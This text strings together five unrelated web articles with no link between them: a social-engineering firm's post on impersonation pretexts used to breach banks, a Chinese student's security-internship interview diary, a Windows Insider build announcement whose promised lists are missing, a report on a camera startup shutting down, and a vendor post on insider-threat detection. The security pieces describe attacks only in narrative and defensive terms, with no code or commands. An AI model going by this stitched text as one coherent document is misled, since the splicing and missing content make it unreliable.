In a previous position , one of our penetration testers used a construction worker pretext to walk into a bank’s corporate office and drop a Raspberry Pi under a desk which allowed for remote access into the internal network. He was able to walk freely around the office without anyone even asking why he was there, or why he was crawling around on the floor messing with wires. This was all possible due to the frame that was built (reflective vest, hard hat, **clipboard**), and the inclination of the employees to not ask questions. Shells were had, and information was exfiltrated all in a relatively short period of time. While this type of attack is risky for the attacker, the ease at which this was done shows that just a few curious employees could have stopped the attack and possibly mitigated the entire breach of the network.

In another example , we were able to compromise a different bank using a pretext of PCI auditors . We were on-site for a surprise inspection u tilizing only b utton up shirts with a logo, general knowledge of PCI related jargon, and a **clipboard**. No questions from anyone for about an hour on-site. In that time, we were crawling on the floor checking cables, putting “Approved” stickers on network jacks, and taking photos of the inside of ATMs in the testing room. We also managed to convince a user to login to the locked workstation next to them with their credentials (which we captured on convert video) and used a proof of concept USB attack on that machine and one other. At that point , we were approached by a concerned manager and were escorted out of the area but not the building.

Th e se examples show that with the right look and the right tools, a stranger can walk into an office and wreak havoc on a business. This is not exclusive to large organizations either. Maybe you are in a small office of 20-40 people, do you know who your printer repair technician is by name? What about your package or food delivery person?

When it comes to defending against social engineering attacks, the primary target and defense share something in common, the people. A fancy firewall or intrusion detection device will not defend against an attacker walking into the building and taking photos of the desks in the accounting department. People will be the primary line of defense. Training your employees to critically think about strangers in the office and ask questions, politely and assertively, is your best defense against impersonation attacks. Have policies and procedures in place to help your employees know what to do when presented with these situations, then test them to ensure your valuable data stays in the hands of those that should have it.

In 2019, include impersonation attacks as part of your security training program. When coupled with regular phishing and vishing tests, you will gain a more accurate picture of your real attack surface. Value your data and protect it with ever resource you have, human and hardware.

Sources:

https://www.social-engineer.org/framework/attack-vectors/impersonation/

https://www.coalfire.com/The-Coalfire-Blog/October-2015/Breaching-a-bank-in-20-minutes

The post In 2019, Test Impersonation Attacks appeared first on Social-Engineer.Com Professional Social Engineering Training and Services .

故事起源于上个月月末吧，怕挂科无奈去上了节毛概课，同学和之前一个学长聊天，就建议去找实习。由于之前暑期没找到实习的缘故，也蛮想找个实习，就开始抱着试一下的心态投了一波。到现在一共过了三个星期多了，这三个星期几乎没咋学习。最后收了拼多多的安全实习工程师的offer。

总共先后面了几家公司。斗象、深信服、长亭、拼多多。360投了两次貌似没得面试资格。。

具体面试的问题都记不大清了，只写几个还记得的。

印象还不错的一家公司，貌似是周六投的申请，工作日之后就开始约面试了。

一面一开始还是熟悉的自我介绍，然后问了些常见的知识点

感觉问题比较基础，就也面试的比较顺利。下午面完一面之后晚上五六点就直接安排了二面

二面据说是团队的leader，但貌似不是搞技术的，就问了下学习成绩和得过哪些奖，讲了下过去要做什么事情（还是很坦诚的。没问什么太实质的问题，就相当于聊聊，也就结束了。

最后晚上HR给我发了offer，那时候表示还想等下长亭和360的面试机会，就给拒了。

那时候中途等了很久的长亭和360没有消息，就投了一波深信服。

由于是队友先面试的，比较偏渗透（我渗透比较菜。然后队友比较顺利过了，给他介绍工作详情的时候看了下，主要是偏向内网安全，用于检测他们的安全产品的。也恰好是我不会也不是太感兴趣的方向，就对这个面试不怎么感兴趣了。

面试的时间并不是提前约好的，是面试官临时打的电话（本来约好的前一天晚上面试，结果被鸽子了

然后就是下午一个突如其来的电话，没有自我介绍，直接问给你一个xxx环境，你咋搞。而且感觉表意貌似不是很明确，问了一些不是很擅长的东西，由于对这个面试也不太感兴趣，也就随意答了下。稳稳的挂了。

中间等了两个星期的面试，一度以为和360一样没有面试机会了。直到上周五，hr小姐姐打了电话约了下面试时间。

一面一开始也是熟悉的自我介绍

介绍一下SQL注入漏洞

就说了下数据与代码没有分离啊巴拉巴拉，然后把之前总结的各种时间盲注布尔盲注，乱七八糟都讲了一边。

union注入没有逗号怎么办。想了很久没有想起来， join 真的感觉很久没用过了！确实搞忘了

然后再让我说了下一些比较基础的常见状态码，以及一些请求方式

面长亭的时候有些紧张，感觉很多东西没有表达好。然后感觉别的厂貌似都不怎么问SQL注入了，长亭还是问的蛮细的。

感觉答了个百分之八九十，虽然有些面试问的时候没想的起来。就是有点紧张，表述不太好！然后面试官对于答得怎么样也没什么太多表示，就说明白，然后下一个问题。

然后这周二晚上hr约了我们hr面，但是那天下午收了拼多多的offer，就无奈拒了（本来真的蛮想去长亭的，感觉很有多师傅，但感觉可能还是甲方更好点

一开始是苦苦等360和长亭的过程中，看到Flanker师傅发了微博招人的信息，也就恬不知耻的在校招群里私聊了下，投了简历。

一面一开始是前个星期了，由于一面是队友先面的，一开始答得蛮好的，然后问了些甲方安全和一些代码基础，就凉的有点快（不过队友最后还是被救起来了

最后问了下面试官甲方安全的侧重点，和我说了蛮多的，什么业务安全，数据安全，巴拉巴拉，小菜鸡的我也听不太懂。

然后就说问了下对我的建议，就是继续学Java，还有就是需要补一下linux之类的基础。

二面，后来听HR说就是Flanker师傅面的（知道的时候满惊讶的，感觉人还是很好的，面试的时候也没太沉闷

由于还是队友先面的，他答得蛮顺利的，面我的时候，我自我介绍，然后介绍完就问我我们是不是一起的

我就说是的，我们两个是同学，然后就随意问了几个基础的问题。

唯一一个比较有印象的就是，给你一个内网环境，怎么防御SSRF，但是比较强调防御的思路，说不要说的太具体，讲一下大概的思路就行。

就说了下做好ip限制，然后配置好一些主机设置啥啥的。最后也没问啥了，说队友那边都答过了，我这肯定也都差不多了。（被躺带了

然后就问了下我们学校，就说我们实验室这一届目前就我们两个人，还是蛮不容易的。然后还问了下过去大概想干什么，让我等HR电话。

本来以为巨稳，然后就等HR电话一直等等等，等到上周五的下午，差点以为拼多多挂了，也就是这中途投了深信服。

然后hr简单问了下情况，实习时间，然后地方在上海，女朋友在哪之类的。

然后这周二下午发了口头的offer，今天上午发了正式的邮件offer，找工作也就划一段落了。

最后能去拼多多确实也没想到，之前是感觉能去长亭已经是万幸了。感觉面试当中，平时有实际的漏洞挖掘经验（渗透也好，代码审计也好）会比较吃香，感觉确实不怎么会问CTF中那些比较偏门的考点。多注重实际的漏洞也算是对平时学习的一种建议。

关于拿奖，介绍的时候就主要说了下拿了个国一，拼多多二面还特地问了下是作品还是攻防的，然后还有就是平时挖的几个通用洞。能给你面试一个哔哔的机会就差不多了。其他的还是比较看平时的积累。

找工作的时候感觉确确实实学不了什么东西，每天都是等待和浮躁。中途也就勉强分析了个tp5的命令执行。后面的时间得准备期末考了，毕业要紧。最后，抓紧学下Java，溜了溜了。

In typical Microsoft fashion, the weekly windows 10 build for Insiders in the Fast Ring is out on a Wednesday, and build 18305 actually included a handful of new additions. These include the new Windows Sandbox experience announced earlier today , improvements to Windows Security, and much more.

However, as usual, there's more to this release than new features. Build 18305 comes with a long list of fixes and general improvements, including a Settings app crash when opening Speech Settings. Here's the full list:

Of course, even with all those improvements, there are a few issues to be found in this release. Specifically, devices in S Mode may fail to install the update after restarting. Here's what you need to be aware of:

Developers also have one specific issue to be aware of:

Build 18305 is the last one to be released in 2018, as the holiday season draws closer. In January, Microsoft will be kicking off the only Bug Bash planned for this release. Today, the company also announced that the dates for the bug-squashing event have been moved to January 23 through February 3.

Lighthouse, a San Francisco home security startup backed by Andy Rubin’sPlayground Ventures, today announced that it’s ceasing operations and extending refunds to customers who return theirpurchases. In a message on the company’s website, CEO Alex Teichman cited a lack of “commercial success” as a contributing factor.

“Unfortunately, we did not achieve the … success we were looking for and will be shutting down operations in the near future,” he wrote . “We remain strong believers in a future with AI at your service, and look forward to inventing that future with you.”

Lighthouse emerged from stealth in May 2017 with $17 million in funding from Playground, in addition to Eclipse Ventures, SignalFire, Start, and individual investor Sebastian Thrun,director of the Artificial Intelligence Laboratory at Stanford University.The three-year-old company, which employed around 30 people and had offices at Playground Ventures’ incubator space in Palo Alto, developed a security camera that leveraged computer vision not only to detect and monitor activity within ahome, but to alert users to disturbances ― like a break-in, for example, or unruly pets and kids ― via text or voice message.

Lighthouse’s eponymous camera was equipped with a microphone and speaker that allowed owners to patch in and speak to people within earshot, but it lacked any sort of smart assistant functionality. It did, however, boast a natural languageprocessing component that responded to both voice and text commands, allowing users to search through a history of recordings quickly.

Moreover, somewhat uniquely, Lighthouse had a time-of-flight sensor that enabled it to generate a three-dimensional map of its surroundings. Development of its depth detection system was spearheaded by Lighthouse cofounder Hendrik Dahlkamp, who worked at Google parent company Alphabet’s X research division and was a member of the team that won the DARPA Grand Challenge forautonomous vehicles.

Much like cameras from Nest and Ring, Lighthouse stored footage in the cloud. That footage will be deleted when service ceases on January 15, but the company is offering users the chance to export their content in the interim weeks.

Insider threats are the biggest cyber security issue for companies and big organizations because they can cause the most damage. These types of cyber security threats are also very hard to detect and prevent in comparison to outsider attacks. This is because insiders already have the ‘keys to the kingdom’. So, what is an insider threat? And how does Gurucul prevent insiders and criminal impersonators from stealing your sensitive information?

Gurucul’s Chief Operating Officer Craig Cooper discusses the cyber security risks that malicious insiders pose for an organization in the video below.

An Insider Threat is an employee or contractor within an organization that is disgruntled or holds some form of resentment against the employer. A malicious insider might be doing something that would normally be outside of their employee responsibilities. This poses a cyber security risk for the organization.

Most of these types of cyber security threats are from employees that are either on their way out of an organization, or very, very disgruntled. Often, they are holding a grudge against the company. An example of this would be the recent Tesla data breach where a disgruntled employee stole sensitive information. The vengeful employee sabotaged company data while abusing his trusted access to the company’s network.

Another form of insider threat may come in the form of an employee leaving a company. The employee might feel entitled to the intellectual property they created. He/she may want to bring it along with them to their new employer.

Lastly, a compromised account is an insider threat. This is considered an insider threat, and not an outsider threat, because it still comes in the form of looking like a malicious insider. For example, if your password was shared, or perhaps your password was fully compromised, your insider account can be used to do malicious things within the organization.

There are many different behaviors that might indicate a potential insider threat. For example, abnormal behavior such as perusing job-hunting websites might indicate that someone is looking to potentially depart the organization . It could be an employee with poor reviews, or someone surfing the internal network. These insiders might be going to source code that hasn’t been accessed for some time; or snooping through company assets like customer lists. Basically, any behavior that strays away from the norm is indicative of a cyber security risk.

How Does a Threat Hunting Solution like Gurucul Risk Analytics Detect and Prevent Cyber Attacks by Insiders?

Gurucul will look at user and entity behavior analytics (UEBA) on a normal day-to-day basis and compare that to baseline behavioral data. So, if a user or entity is going to places that they don’t normally go to, that might be a clear indicator of a potential cyber threat. Perhaps they are going to document stores or other types of company assets. Maybe they usually go there once or twice a day but now they’re visiting SharePoint 200-300 times in a very short period. Those types of behaviors are what Gurucul Risk Analytics takes into account when threat hunting for malicious insiders.

Explore Gurucul Risk Analytics and insider threat hunting solutions for your organization. Request a demo with us today!

The post What is an ‘Insider Threat’ and How Do We Detect Them? appeared first on Gurucul .